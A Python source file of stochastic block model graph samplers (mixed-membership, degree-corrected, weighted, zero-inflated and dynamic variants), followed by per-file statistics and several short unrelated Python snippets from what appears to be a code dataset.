    A = symmetrises(stats.bernoulli.rvs(edge_probs))
    return (A, Z)
def generate_MMSBM(n, B, alpha):
    """Sample an adjacency matrix from a mixed-membership SBM.

    :param n: number of nodes
    :param B: K-by-K inter-block edge-probability matrix
    :param alpha: length-K Dirichlet concentration parameters
    :return: (A, Z) adjacency matrix and per-node membership vectors
    """
    K = len(alpha)
    if B.shape[0] != K or B.shape[1] != K:
        raise ValueError('B must be a square matrix size K-by-K')
    Z = stats.dirichlet.rvs(alpha, size=n)
    # Each node re-draws a hard block per potential partner.
    per_pair = [np.random.choice(range(K), p=membership, size=n)
                for membership in Z]
    Zij = np.array(per_pair)
    A = symmetrises(stats.bernoulli.rvs(B[Zij, Zij.T]))
    return (A, Z)
def generate_DCSBM(n, B, pi, a=1, b=1):
    """Sample a degree-corrected SBM adjacency matrix.

    :param n: number of nodes
    :param B: K-by-K inter-block edge-probability matrix
    :param pi: length-K block membership probabilities
    :param a, b: Beta(a, b) parameters for per-node degree weights
    :return: (A, Z, W) adjacency matrix, block labels, degree weights
    """
    K = len(pi)
    if not (B.shape[0] == K and B.shape[1] == K):
        raise ValueError('B must be a square matrix size K-by-K')
    W = stats.beta.rvs(size=n, a=a, b=b)
    Z = np.random.choice(range(K), p=pi, size=n)
    degree_scale = np.outer(W, W)  # rank-one degree correction
    A = symmetrises(stats.bernoulli.rvs(degree_scale * B[Z, :][:, Z]))
    return (A, Z, W)
def generate_WSBM(n, pi, params, distbn):
    """Sample a weighted SBM adjacency matrix and block labels.

    :param n: number of nodes
    :param pi: length-K block membership probabilities
    :param params: family-specific K-by-K parameter matrices
    :param distbn: one of 'beta', 'exponential', 'gamma', 'gaussian', 'poisson'
    :return: (A, Z) weighted adjacency matrix and block labels
    """
    K = len(pi)
    if distbn not in ['beta', 'exponential', 'gamma', 'gaussian', 'poisson']:
        raise ValueError('distbn must be beta, exponential, gamma, gaussian or poisson')
    # Exactly one family branch runs; each validates its params, draws the
    # block labels, then samples edge weights from that family.
    if distbn == 'beta':
        if len(params) != 2 or params[0].shape != (K, K) or params[1].shape != (K, K):
            raise ValueError('params must be two square matrices size K-by-K [alphas, betas]')
        Z = np.random.choice(range(K), p=pi, size=n)
        A = symmetrises(stats.beta.rvs(a=params[0][Z, :][:, Z], b=params[1][Z, :][:, Z]))
    elif distbn == 'exponential':
        if len(params) != 1 or params[0].shape != (K, K):
            raise ValueError('params must be one square matrix size K-by-K [lambdas]')
        Z = np.random.choice(range(K), p=pi, size=n)
        A = symmetrises(stats.expon.rvs(scale=1/params[0][Z, :][:, Z]))
    elif distbn == 'gamma':
        if len(params) != 2 or params[0].shape != (K, K) or params[1].shape != (K, K):
            raise ValueError('params must be two square matrices size K-by-K [alphas, betas]')
        Z = np.random.choice(range(K), p=pi, size=n)
        A = symmetrises(stats.gamma.rvs(a=params[0][Z, :][:, Z], scale=1/params[1][Z, :][:, Z]))
    elif distbn == 'gaussian':
        if len(params) != 2 or params[0].shape != (K, K) or params[1].shape != (K, K):
            raise ValueError('params must be two square matrices size K-by-K [means, variances]')
        Z = np.random.choice(range(K), p=pi, size=n)
        A = symmetrises(stats.norm.rvs(loc=params[0][Z, :][:, Z], scale=np.sqrt(params[1][Z, :][:, Z])))
    elif distbn == 'poisson':
        if len(params) != 1 or params[0].shape != (K, K):
            raise ValueError('params must be one square matrix size K-by-K [lambdas]')
        Z = np.random.choice(range(K), p=pi, size=n)
        A = symmetrises(stats.poisson.rvs(mu=params[0][Z, :][:, Z]))
    return (A, Z)
def generate_WMMSBM(n, alpha, params, distbn):
    """Sample a weighted mixed-membership SBM adjacency matrix.

    Each node draws a Dirichlet membership vector; for every potential
    partner a hard block is re-drawn, and the edge weight is sampled from
    the chosen distribution family with per-pair block parameters.

    :param n: number of nodes
    :param alpha: length-K Dirichlet concentration parameters
    :param params: family-specific K-by-K parameter matrices
    :param distbn: one of 'beta', 'exponential', 'gamma', 'gaussian', 'poisson'
    :return: (A, Z) weighted adjacency matrix and membership vectors
    """
    K = len(alpha)
    if distbn not in ['beta', 'exponential', 'gamma', 'gaussian', 'poisson']:
        raise ValueError('distbn must be beta, exponential, gamma, gaussian or poisson')
    # Exactly one family branch runs (distbn is a single string).
    if distbn == 'beta':
        if len(params) != 2 or params[0].shape != (K,K) or params[1].shape != (K,K):
            raise ValueError('params must be two square matrices size K-by-K [alphas, betas]')
        Z = stats.dirichlet.rvs(alpha, size=n)
        # One hard block per (node, partner) pair, drawn from the node's membership.
        Zij = np.array([np.random.choice(range(K), p=Zi, size=n) for Zi in Z])
        A = symmetrises(stats.beta.rvs(a = params[0][Zij,Zij.T], b = params[1][Zij,Zij.T]))
    if distbn == 'exponential':
        if len(params) != 1 or params[0].shape != (K,K):
            raise ValueError('params must be one square matrix size K-by-K [lambdas]')
        Z = stats.dirichlet.rvs(alpha, size=n)
        Zij = np.array([np.random.choice(range(K), p=Zi, size=n) for Zi in Z])
        # scipy's expon is parameterized by scale = 1/rate.
        A = symmetrises(stats.expon.rvs(scale = 1/params[0][Zij,Zij.T]))
    if distbn == 'gamma':
        if len(params) != 2 or params[0].shape != (K,K) or params[1].shape != (K,K):
            raise ValueError('params must be two square matrices size K-by-K [alphas, betas]')
        Z = stats.dirichlet.rvs(alpha, size=n)
        Zij = np.array([np.random.choice(range(K), p=Zi, size=n) for Zi in Z])
        A = symmetrises(stats.gamma.rvs(a = params[0][Zij,Zij.T], scale = 1/params[1][Zij,Zij.T]))
    if distbn == 'gaussian':
        if len(params) != 2 or params[0].shape != (K,K) or params[1].shape != (K,K):
            raise ValueError('params must be two square matrices size K-by-K [means, variances]')
        Z = stats.dirichlet.rvs(alpha, size=n)
        Zij = np.array([np.random.choice(range(K), p=Zi, size=n) for Zi in Z])
        # params[1] holds variances; norm.rvs takes a standard deviation.
        A = symmetrises(stats.norm.rvs(loc = params[0][Zij,Zij.T], scale = np.sqrt(params[1][Zij,Zij.T])))
    if distbn == 'poisson':
        if len(params) != 1 or params[0].shape != (K,K):
            raise ValueError('params must be one square matrix size K-by-K [lambdas]')
        Z = stats.dirichlet.rvs(alpha, size=n)
        Zij = np.array([np.random.choice(range(K), p=Zi, size=n) for Zi in Z])
        A = symmetrises(stats.poisson.rvs(mu = params[0][Zij,Zij.T]))
    return (A, Z)
def generate_ZISBM(n, pi, params, distbn, a=1, b=1):
    """Sample a zero-inflated weighted SBM.

    Edge weights are drawn from the chosen family, then each edge is kept
    or zeroed by a Bernoulli mask whose probability is the product of the
    two endpoints' Beta(a, b) propensities W.

    :param n: number of nodes
    :param pi: length-K block membership probabilities
    :param params: family-specific K-by-K parameter matrices
    :param distbn: one of 'beta', 'exponential', 'gamma', 'gaussian', 'poisson'
    :param a, b: Beta(a, b) parameters for per-node edge propensities
    :return: (A*ZI, Z, W) masked weighted adjacency, labels, propensities
    """
    K = len(pi)
    if distbn not in ['beta', 'exponential', 'gamma', 'gaussian', 'poisson']:
        raise ValueError('distbn must be beta, exponential, gamma, gaussian or poisson')
    # Exactly one family branch runs (distbn is a single string).
    if distbn == 'beta':
        if len(params) != 2 or params[0].shape != (K,K) or params[1].shape != (K,K):
            raise ValueError('params must be two square matrices size K-by-K [alphas, betas]')
        W = stats.beta.rvs(size=n, a=a, b=b)
        Z = np.random.choice(range(K), p=pi, size=n)
        A = symmetrises(stats.beta.rvs(a = params[0][Z,:][:,Z], b = params[1][Z,:][:,Z]))
        # ZI is the zero-inflation mask: keep edge (i, j) with prob W[i]*W[j].
        ZI = symmetrises(stats.bernoulli.rvs(np.outer(W,W)))
    if distbn == 'exponential':
        if len(params) != 1 or params[0].shape != (K,K):
            raise ValueError('params must be one square matrix size K-by-K [lambdas]')
        W = stats.beta.rvs(size=n, a=a, b=b)
        Z = np.random.choice(range(K), p=pi, size=n)
        # scipy's expon is parameterized by scale = 1/rate.
        A = symmetrises(stats.expon.rvs(scale = 1/params[0][Z,:][:,Z]))
        ZI = symmetrises(stats.bernoulli.rvs(np.outer(W,W)))
    if distbn == 'gamma':
        if len(params) != 2 or params[0].shape != (K,K) or params[1].shape != (K,K):
            raise ValueError('params must be two square matrices size K-by-K [alphas, betas]')
        W = stats.beta.rvs(size=n, a=a, b=b)
        Z = np.random.choice(range(K), p=pi, size=n)
        A = symmetrises(stats.gamma.rvs(a = params[0][Z,:][:,Z], scale = 1/params[1][Z,:][:,Z]))
        ZI = symmetrises(stats.bernoulli.rvs(np.outer(W,W)))
    if distbn == 'gaussian':
        if len(params) != 2 or params[0].shape != (K,K) or params[1].shape != (K,K):
            raise ValueError('params must be two square matrices size K-by-K [means, variances]')
        W = stats.beta.rvs(size=n, a=a, b=b)
        Z = np.random.choice(range(K), p=pi, size=n)
        # params[1] holds variances; norm.rvs takes a standard deviation.
        A = symmetrises(stats.norm.rvs(loc = params[0][Z,:][:,Z], scale = np.sqrt(params[1][Z,:][:,Z])))
        ZI = symmetrises(stats.bernoulli.rvs(np.outer(W,W)))
    if distbn == 'poisson':
        if len(params) != 1 or params[0].shape != (K,K):
            raise ValueError('params must be one square matrix size K-by-K [lambdas]')
        W = stats.beta.rvs(size=n, a=a, b=b)
        Z = np.random.choice(range(K), p=pi, size=n)
        A = symmetrises(stats.poisson.rvs(mu = params[0][Z,:][:,Z]))
        ZI = symmetrises(stats.bernoulli.rvs(np.outer(W,W)))
    return (A*ZI, Z, W)
def generate_WSBM_zero(n, pi, params, distbn, rho):
    """Weighted SBM whose edges are independently kept with probability rho."""
    A, Z = generate_WSBM(n, pi, params, distbn)
    mask = symmetrises(stats.bernoulli.rvs(rho, size=(n, n)))
    return (mask * A, Z)
def generate_WMMSBM_zero(n, alpha, params, distbn, rho):
    """Weighted mixed-membership SBM with edges independently kept w.p. rho.

    :param n: number of nodes
    :param alpha: length-K Dirichlet concentration parameters
    :param params: family-specific K-by-K parameter matrices
    :param distbn: one of 'beta', 'exponential', 'gamma', 'gaussian', 'poisson'
    :param rho: probability an edge survives the zeroing mask
    :return: (W*A, Z) masked weighted adjacency and membership vectors
    """
    # Fix: the original passed the undefined name `pi` here (NameError at
    # runtime); this function's membership parameter is `alpha`.
    (A, Z) = generate_WMMSBM(n, alpha, params, distbn)
    W = symmetrises(stats.bernoulli.rvs(rho, size=(n,n)))
    return (W*A, Z)
def generate_SBM_dynamic(n, Bs, pi):
    """Sample T SBM adjacency snapshots sharing one set of block labels.

    :param n: number of nodes
    :param Bs: array of T K-by-K inter-block probability matrices
    :param pi: length-K block membership probabilities
    :return: (As, Z) T-by-n-by-n adjacency stack and block labels
    """
    K = len(pi)
    T = Bs.shape[0]
    if Bs.shape[1] != K or Bs.shape[2] != K:
        raise ValueError('Bs must be array of T square matrices size K-by-K')
    Z = np.random.choice(range(K), p=pi, size=n)
    As = np.zeros((T, n, n))
    # Labels are fixed; only the edge draws differ per snapshot.
    for t, Bt in enumerate(Bs):
        As[t] = symmetrises(stats.bernoulli.rvs(Bt[Z, :][:, Z]))
    return (As, Z)
def generate_MMSBM_dynamic(n, Bs, alpha):
    """Sample T mixed-membership SBM snapshots sharing membership vectors.

    :param n: number of nodes
    :param Bs: array of T K-by-K inter-block probability matrices
    :param alpha: length-K Dirichlet concentration parameters
    :return: (As, Z) T-by-n-by-n adjacency stack and membership vectors
    """
    K = len(alpha)
    T = Bs.shape[0]
    if Bs.shape[1] != K or Bs.shape[2] != K:
        raise ValueError('Bs must be array of T square matrices size K-by-K')
    # Fix: the original referenced the undefined name `pi` and drew hard
    # labels with np.random.choice; the mixed-membership Z must be a stack
    # of Dirichlet rows (cf. generate_MMSBM) for the per-snapshot Zij
    # sampling below, which uses each row Zi as a probability vector.
    Z = stats.dirichlet.rvs(alpha, size=n)
    As = np.zeros((T, n, n))
    for t in range(T):
        # Blocks are re-drawn per pair at every snapshot.
        Zij = np.array([np.random.choice(range(K), p=Zi, size=n) for Zi in Z])
        As[t] = symmetrises(stats.bernoulli.rvs(Bs[t][Zij, Zij.T]))
    return (As, Z)
def generate_DCSBM_dynamic(n, Bs, pi):
    """Sample T degree-corrected SBM snapshots with shared labels and weights.

    :param n: number of nodes
    :param Bs: array of T K-by-K inter-block probability matrices
    :param pi: length-K block membership probabilities
    :return: (As, Z, W) adjacency stack, block labels, degree weights
    """
    K = len(pi)
    T = Bs.shape[0]
    if Bs.shape[1] != K or Bs.shape[2] != K:
        raise ValueError('Bs must be array of T square matrices size K-by-K')
    W = stats.uniform.rvs(size=n)
    Z = np.random.choice(range(K), p=pi, size=n)
    degree_scale = np.outer(W, W)  # same degree correction for every snapshot
    As = np.zeros((T, n, n))
    for t in range(T):
        As[t] = symmetrises(stats.bernoulli.rvs(degree_scale * Bs[t][Z, :][:, Z]))
    return (As, Z, W)
| 39.960159
| 106
| 0.559721
| 1,630
| 10,030
| 3.432515
| 0.053374
| 0.033065
| 0.030027
| 0.07471
| 0.93655
| 0.919571
| 0.896515
| 0.874888
| 0.842359
| 0.838606
| 0
| 0.012507
| 0.258624
| 10,030
| 251
| 107
| 39.960159
| 0.739914
| 0
| 0
| 0.79096
| 0
| 0
| 0.153424
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073446
| false
| 0
| 0.011299
| 0.00565
| 0.163842
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1ea790bb4b828a20b18eb4f07aa57a4eec9e91b5
| 138
|
py
|
Python
|
kubedriver/helmclient/__init__.py
|
manojn97/kubernetes-driver
|
06f554e7e74927d528bce51807ed52b4a3a77aa4
|
[
"Apache-2.0"
] | 2
|
2021-07-19T07:11:36.000Z
|
2021-08-20T00:42:31.000Z
|
kubedriver/helmclient/__init__.py
|
manojn97/kubernetes-driver
|
06f554e7e74927d528bce51807ed52b4a3a77aa4
|
[
"Apache-2.0"
] | 39
|
2020-08-21T07:39:31.000Z
|
2022-03-21T09:26:08.000Z
|
kubedriver/helmclient/__init__.py
|
manojn97/kubernetes-driver
|
06f554e7e74927d528bce51807ed52b4a3a77aa4
|
[
"Apache-2.0"
] | 11
|
2020-09-29T06:03:50.000Z
|
2022-03-07T06:29:36.000Z
|
from .client import HelmClient
from .tls import HelmTls
from .exceptions import HelmError
from .exceptions import HelmCommandNotFoundError
| 34.5
| 48
| 0.862319
| 16
| 138
| 7.4375
| 0.5625
| 0.235294
| 0.336134
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108696
| 138
| 4
| 48
| 34.5
| 0.96748
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
94b57cae903b51defa0969f0dfc054f5bfbc43b5
| 14,115
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/ShowPowerInlineUpoePlusModule/cli/equal/golden_output_2_expected.py
|
nielsvanhooy/genieparser
|
9a1955749697a6777ca614f0af4d5f3a2c254ccd
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowPowerInlineUpoePlusModule/cli/equal/golden_output_2_expected.py
|
nielsvanhooy/genieparser
|
9a1955749697a6777ca614f0af4d5f3a2c254ccd
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowPowerInlineUpoePlusModule/cli/equal/golden_output_2_expected.py
|
nielsvanhooy/genieparser
|
9a1955749697a6777ca614f0af4d5f3a2c254ccd
|
[
"Apache-2.0"
] | null | null | null |
# Expected parsed output for "show power inline upoe-plus module 2" (golden
# output 2).  The original literal repeated the same 7-key interface dict 48
# times; it is built programmatically here, producing an identical value
# (same keys, same insertion order, same floats/strings).

def _upoe_interface(if_type, operating_state, allocated, utilized, poe_class, device):
    """Build one per-interface entry of the expected parser output."""
    return {
        "admin_state": "auto",
        "type": if_type,
        "operating_state": operating_state,
        "allocated_power": allocated,
        "utilized_power": utilized,
        "class": poe_class,
        "device": device,
    }

# Dual-signature (DS) ports 1-24 differ only in utilized power.
_DS_UTILIZED = {
    1: 5.2, 2: 5.2, 3: 5.5, 4: 5.5, 5: 5.1, 6: 5.2, 7: 5.2, 8: 5.5,
    9: 5.5, 10: 5.2, 11: 5.2, 12: 5.5, 13: 5.5, 14: 5.5, 15: 5.2, 16: 5.5,
    17: 5.2, 18: 5.2, 19: 5.5, 20: 5.5, 21: 5.5, 22: 5.5, 23: 5.5, 24: 5.5,
}

# Single-pair (SP) ports: (allocated_power, utilized_power, class).
_SP_PORTS = {
    25: (4.0, 3.6, "1"), 26: (7.0, 6.7, "2"), 27: (15.4, 14.5, "3"),
    28: (30.0, 29.9, "4"), 29: (4.0, 3.6, "1"), 30: (7.0, 6.7, "2"),
    31: (15.4, 14.7, "3"), 32: (30.0, 29.2, "4"),
}

_interfaces = {}
for _port in range(1, 49):
    _name = "TenGigabitEthernet7/0/%d" % _port
    if _port in _DS_UTILIZED:
        _interfaces[_name] = _upoe_interface(
            "DS", "on,on", 90.0, _DS_UTILIZED[_port], "5,5", "Ieee PD"
        )
    elif _port in _SP_PORTS:
        _alloc, _util, _cls = _SP_PORTS[_port]
        _interfaces[_name] = _upoe_interface("SP", "on", _alloc, _util, _cls, "Ieee PD")
    elif _port == 37:
        # Single-signature port with one pair powered ("on,off").
        _interfaces[_name] = _upoe_interface("SS", "on,off", 30.0, 20.4, "4", "Ieee PD")
    else:
        # Ports 33-36 and 38-48 (except 37) are unpowered.
        _interfaces[_name] = _upoe_interface("n/a", "off", 0.0, 0.0, "n/a", "")

expected_output = {
    "module": {7: {"available": 8850.0, "used": 2512.8, "remaining": 6337.2}},
    "interface": _interfaces,
    "total": {
        "type": 33,
        "operating_state": "on",
        "allocated_power": 2302.8,
        "utilized_power": 258.0,
    },
}
| 31.719101
| 79
| 0.389798
| 1,229
| 14,115
| 4.317331
| 0.067535
| 0.129288
| 0.126649
| 0.162835
| 0.95213
| 0.946476
| 0.940822
| 0.905013
| 0.897663
| 0.897663
| 0
| 0.062067
| 0.437265
| 14,115
| 444
| 80
| 31.790541
| 0.605942
| 0
| 0
| 0.742664
| 0
| 0
| 0.398098
| 0.083614
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a20fbfe5596c3849764201f24c2cdd1245762b7c
| 126
|
py
|
Python
|
fits2hdf/__init__.py
|
telegraphic/fits2hdf
|
a5d66d104fdc70d67c2dac8103b70e5fe3bb9a01
|
[
"MIT"
] | 22
|
2015-03-02T21:38:33.000Z
|
2021-05-09T11:30:41.000Z
|
fits2hdf/__init__.py
|
telegraphic/fits2hdf
|
a5d66d104fdc70d67c2dac8103b70e5fe3bb9a01
|
[
"MIT"
] | 16
|
2015-03-01T23:11:49.000Z
|
2019-08-08T03:18:30.000Z
|
fits2hdf/__init__.py
|
telegraphic/fits2hdf
|
a5d66d104fdc70d67c2dac8103b70e5fe3bb9a01
|
[
"MIT"
] | 11
|
2015-03-26T14:50:33.000Z
|
2021-12-11T13:21:12.000Z
|
from __future__ import absolute_import
from . import io
from . import idi
from . import pyhdfits
from . import pyhdfits as pf
| 21
| 38
| 0.793651
| 19
| 126
| 5
| 0.473684
| 0.421053
| 0.378947
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.174603
| 126
| 5
| 39
| 25.2
| 0.913462
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bf5b8ee8902c0fb2f57c42e655897137daa0c6c7
| 870
|
py
|
Python
|
storm/dp_zigzag.py
|
italo-batista/problems-solving
|
f83ad34f0abebd52925c4020635556f20743ba06
|
[
"MIT"
] | null | null | null |
storm/dp_zigzag.py
|
italo-batista/problems-solving
|
f83ad34f0abebd52925c4020635556f20743ba06
|
[
"MIT"
] | null | null | null |
storm/dp_zigzag.py
|
italo-batista/problems-solving
|
f83ad34f0abebd52925c4020635556f20743ba06
|
[
"MIT"
] | null | null | null |
def zigzag_length(numbers):
    """Return the length of the longest alternating (zigzag) run tracked
    by the original dynamic program.

    dp[i] is the count after examining element i: it grows by one whenever
    the sign of (numbers[i-1] - numbers[i]) alternates relative to the
    previous step, and stays flat otherwise.

    NOTE(review): the initial last_diff_positive = True is preserved from
    the original, so a first step with numbers[0] >= numbers[1] does not
    extend the count — confirm this asymmetry is intended.
    """
    count = len(numbers)
    if count == 0:
        # Robustness fix: the original evaluated dp[-1] on an empty dp
        # list, raising IndexError for empty input.
        return 0
    dp = [0] * count
    last_diff_positive = True
    for i in range(count):
        if i == 0:
            dp[i] = 1
        else:
            diff = numbers[i - 1] - numbers[i]
            if (diff >= 0 and not last_diff_positive) or (diff < 0 and last_diff_positive):
                dp[i] = dp[i - 1] + 1
            else:
                dp[i] = dp[i - 1]
            last_diff_positive = diff >= 0
    return dp[-1]


def main():
    """Read the (unused) count line and the comma-separated numbers from
    stdin, then print the zigzag length — same I/O contract as before."""
    # The original read n first and sized dp with it; the list length is
    # now taken from the parsed data itself.
    input()
    numbers = [int(token) for token in input().split(",")]
    print(zigzag_length(numbers))


if __name__ == "__main__":
    main()

# Fixes applied: converted Python-2-only syntax (print statement, raw_input,
# int-returning input) to Python 3, wrapped the logic in a testable function,
# and removed the commented-out duplicate of the entire script (dead code).
| 11.447368
| 82
| 0.521839
| 125
| 870
| 3.616
| 0.2
| 0.059735
| 0.044248
| 0.053097
| 0.99115
| 0.99115
| 0.99115
| 0.99115
| 0.99115
| 0.99115
| 0
| 0.034483
| 0.3
| 870
| 75
| 83
| 11.6
| 0.707718
| 0.397701
| 0
| 0.117647
| 0
| 0
| 0.001972
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.058824
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bfd2cf24a3fcc8006422bda9ef9b8446169be37f
| 1,942
|
py
|
Python
|
Modos.py
|
David-Marinho/quiz-game-em-python
|
d99c76e2104835e615075d14b28dc66efa7145bc
|
[
"MIT"
] | null | null | null |
Modos.py
|
David-Marinho/quiz-game-em-python
|
d99c76e2104835e615075d14b28dc66efa7145bc
|
[
"MIT"
] | null | null | null |
Modos.py
|
David-Marinho/quiz-game-em-python
|
d99c76e2104835e615075d14b28dc66efa7145bc
|
[
"MIT"
] | null | null | null |
from random import *
from design import *
def modo1(lista_jogadores, perguntas):
    """Fixed-round quiz mode: asks the chosen number of questions, awards a
    point per correct answer, and prints the final scoreboard."""
    total_rodadas = int(input('quantas perguntas nessa rodada? '))
    acertadores = []
    shuffle(perguntas)
    for _ in range(total_rodadas):
        # Take the next shuffled question: 'p' is the prompt, 'r' the answer.
        atual = perguntas.pop(0)
        enunciado, gabarito = atual['p'], atual['r']
        titulo(enunciado)
        for jogador in lista_jogadores:
            jogador.resp = str(input(f'Jogador(a) {jogador.nome}, digite sua resposta: '))
            if jogador.resp == gabarito:
                jogador.add_pontos()
                acertadores.append(jogador.nome)
        # Per-question recap of who scored.
        print('Jogadores que acertaram: ', end='')
        for nome in acertadores:
            print(f'||{nome}|| ', end='')
        print()
        acertadores.clear()
        atual.clear()
    # Final results screen with every player's score.
    tela_resultado()
    for jogador in lista_jogadores:
        print(f'{jogador.nome} ----- {jogador.pontos}')
def modo2(lista_jogadores, perguntas):
    """Race-to-a-score quiz mode: keeps asking questions until some player
    reaches the chosen point total, then prints the final scoreboard."""
    meta = int(input('quantos pontos maximos nessa rodada? '))
    acertadores = []
    shuffle(perguntas)
    while True:
        # Take the next shuffled question: 'p' is the prompt, 'r' the answer.
        atual = perguntas.pop(0)
        enunciado, gabarito = atual['p'], atual['r']
        titulo(enunciado)
        for jogador in lista_jogadores:
            jogador.resp = str(input(f'Jogador(a) {jogador.nome}, digite sua resposta: '))
            if jogador.resp == gabarito:
                jogador.add_pontos()
                acertadores.append(jogador.nome)
        # Stop as soon as any player hits the target score; the final
        # round's recap is intentionally skipped, as in the original.
        if any(jogador.pontos == meta for jogador in lista_jogadores):
            break
        print('Jogadores que acertaram: ', end='')
        for nome in acertadores:
            print(f'||{nome}|| ', end='')
        print()
        acertadores.clear()
        atual.clear()
    # Final results screen with every player's score.
    tela_resultado()
    for jogador in lista_jogadores:
        print(f'{jogador.nome} ----- {jogador.pontos}')
| 27.352113
| 88
| 0.582904
| 203
| 1,942
| 5.502463
| 0.280788
| 0.087735
| 0.07162
| 0.042972
| 0.876455
| 0.854073
| 0.716204
| 0.716204
| 0.716204
| 0.716204
| 0
| 0.002933
| 0.297631
| 1,942
| 70
| 89
| 27.742857
| 0.815982
| 0
| 0
| 0.8
| 0
| 0
| 0.166323
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04
| false
| 0
| 0.04
| 0
| 0.08
| 0.16
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
44b2358c5a849bd0412d24bac236188540c77ee3
| 46
|
py
|
Python
|
imports/twofiles/for_import.py
|
suroegin-learning/learn-python
|
be5bda86add0dcd6f2fd3db737bb7d0d3ec5f853
|
[
"MIT"
] | null | null | null |
imports/twofiles/for_import.py
|
suroegin-learning/learn-python
|
be5bda86add0dcd6f2fd3db737bb7d0d3ec5f853
|
[
"MIT"
] | null | null | null |
imports/twofiles/for_import.py
|
suroegin-learning/learn-python
|
be5bda86add0dcd6f2fd3db737bb7d0d3ec5f853
|
[
"MIT"
] | null | null | null |
def x(y):
    """Print *y* followed by a tag identifying this module as the import source."""
    etiqueta = "from for import file"
    print(y, etiqueta)
| 23
| 36
| 0.608696
| 9
| 46
| 3.111111
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.217391
| 46
| 2
| 36
| 23
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0.425532
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0.5
| 0
| 1
| 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
44dde7c61de217397c734002e1ecd6d90e443d7f
| 45
|
py
|
Python
|
flake8_intsights/__init__.py
|
Intsights/flake8-intsights
|
b3785a3be855e05090641696e0648486107dba72
|
[
"MIT"
] | 12
|
2020-02-18T17:47:57.000Z
|
2021-07-13T10:23:40.000Z
|
flake8_intsights/__init__.py
|
Intsights/flake8-intsights
|
b3785a3be855e05090641696e0648486107dba72
|
[
"MIT"
] | 7
|
2020-02-25T12:14:11.000Z
|
2020-12-01T08:14:58.000Z
|
flake8_intsights/__init__.py
|
Intsights/flake8-intsights
|
b3785a3be855e05090641696e0648486107dba72
|
[
"MIT"
] | 1
|
2020-07-01T15:49:28.000Z
|
2020-07-01T15:49:28.000Z
|
from . import checkers
from . import checker
| 15
| 22
| 0.777778
| 6
| 45
| 5.833333
| 0.666667
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177778
| 45
| 2
| 23
| 22.5
| 0.945946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
44ea42b5965b42da416f8bf520137370f5f9438d
| 187
|
py
|
Python
|
teamgrid/envs/__init__.py
|
mila-iqia/teamgrid
|
7a6f0bf5499875a71a0e87bf5b6ce638b5587f70
|
[
"BSD-3-Clause"
] | 8
|
2020-12-29T17:25:45.000Z
|
2022-03-25T10:53:20.000Z
|
